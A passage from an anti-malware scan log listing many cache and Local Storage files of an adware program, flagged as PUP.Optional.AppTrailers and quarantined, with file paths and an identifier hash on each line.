    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\52831aa7f278403d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\52d6acef1cef9bd8_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\53b332c52082d7b0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\54df9ef19c57b2e6_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5519176c8288a1f4_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\558aa2025efdc9f3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\56da2cf07e157aed_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5747b60c048e99e1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\575096e145d8e7dc_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d118f336e2cd22e5_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d4a5cd921965b690_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d512b2657371334d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d641130adedfa93d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d6b2fa9ac1d23187_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d700d96aef681264_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d71e7b4962e9f160_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d73d3f3028d6ceb8_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d7d896af091b5ed6_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d81aa319d82431d1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d8a65c9a08ff830b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d91f40ebc3aea22c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d928bf4e3b671328_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\aaf408a4d5d14baf_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\aba4d33f6f9c5d7b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\ac9268452e285e5f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\ad5b57227d69c3d2_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\af8c2395d8796c0d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\afa3e6adf48b168e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\afdee28a0ea89ea6_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b0847b9dc32c6a06_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b1473a2812cd3a83_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b19600b30866b901_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b249e66422cc95dd_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b2dfbe608f167e4a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\b330090b68bfee31_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f3d544637eaeffad_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f5477bd3c0684b82_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f552ab47376f113e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f588cf0fafbbb8aa_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f5aba122a0ef6386_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f6587b15ff9d2095_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f6f8e87f5363c359_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f72cf1bf0ba490a7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e28dad4eb518817f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e3415dfd9ef788e7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e39b8fcfce4c4350_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e45841fbf11f0a83_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e4c124f94bfdf35b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e4d561d03df3736b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e4fc863b614c6708_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e564e60954b258c1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\bc36a3b7355cadee_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\bc9139e632f9ad2a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\bd48447363dfb226_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\bd6189fff1814b2c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\be104a3a602e2429_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c02ce300b153b696_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c0c650d3522461d9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c15bf0e9c74540f4_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c18c16a141a78505_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c29f69b54a69cf07_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c4248626a9c9365d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c4ce41dea84c8896_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c7362bd4f27d3f19_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c7495f8c1d96097d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c78f793964c41aa3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\c962e89206bb51a1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\cacfb6cc1374e821_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\892057f841c78e8c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\897a91586411223c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8982979593163d88_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8a68a7ae4d06e528_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8ae3c0d1e6c52ee0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8b62b05d51f740fb_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8c1caaaa17f54e71_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8c9c2eebf6e94ad9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8e37269897840de8_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8ebb5551dbad3b7a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\8f601d2f8b4278f0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\906a6b72ea69066b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\90c0121161366734_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\90cd588e91684d04_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\90d6823b7aa7a266_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\044f10f0e45b2e7c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\062e5d03b09b1ae8_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\06484cf527ab201c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\06ce8df5ff1ae4ae_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\074fd2dd7ccad822_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\07b6f66686ae528a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\09d1a5d873608875_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\09f13dcb860a94b9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\0a4e9fc12c0a6818_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\0aff91c56bb3d8dd_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\0b89c6fd1278cc68_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\0bfd2f1b836a7dc0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\3e32a16b7c014aa9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\3ede0fbb4312e8a8_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\3ef0fb7ea6a59541_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\40791460afd3cff6_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\40d449c2d211d10b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\412f24bfdc6de6ac_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\42195acd27428b24_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\421f38ab5b55b843_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\42d65459c6c439b4_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\43f459188dd5a313_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\68e5b1c14e314555_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\69a62c1a00215cc3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\6b685641c3771fcd_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\6d2160c04758db77_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\6dd59deb58de5bce_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\6df1674bf7dc80ec_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\6f3549f2975ed3f2_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\6ffa0ca04038c6e7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\71a581b8442fb0ea_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\72906763797eb7cd_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\1495e2fdbcc816ad_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\14ced75cd2bb02f7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\15983118f1661934_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\15b7207c31c67481_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\18a1dc8a5184b4bb_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\18bb37b44e6a7933_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\18c4290b00b1265b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\194f0d227cbd5d44_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\19dafc2d563ee292_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\78489fe6e41bc4ba_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\7a31c82631e1680e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\7bbe0c081df360bd_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\7bd79b54713136bf_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\7c0f3f33fe905ea6_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\7d8597a0c7e6cd14_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\7e4e5d08824b7979_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\7f363a1365bc301e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\7feb273837f00de7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5ca0e7b199c8d746_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5d46899cf68645b0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5d58d1301bc04690_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5eab1fd35a76b7ea_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5ede7465ad814101_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\5f39b8191b143326_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\62dbf54db6ac539d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\62dca61bfdca329a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\644ee58659bc486f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\65021574e381d493_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\654bc8470f7a0d6e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\98764b5215e34164_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\993797e0c45d9553_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\99497a1a050357c2_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\9a5e128c7a096502_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\9a79b420a2f5a50a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\9d37ac779baf8f44_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a1bf624bd6ece69c_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\a2800fce5f879e88_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\index-dir\the-real-index, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\file__0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\file__0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_cdncache-a.akamaihd.net_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_cdncache-a.akamaihd.net_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_cjs.linkbolic.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_cjs.linkbolic.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_static.donation-tools.org_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_static.donation-tools.org_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_v3x3b3b5.map2.ssl.hwcdn.net_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\https_v3x3b3b5.map2.ssl.hwcdn.net_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_nps.pastaleads.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_nps.pastaleads.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
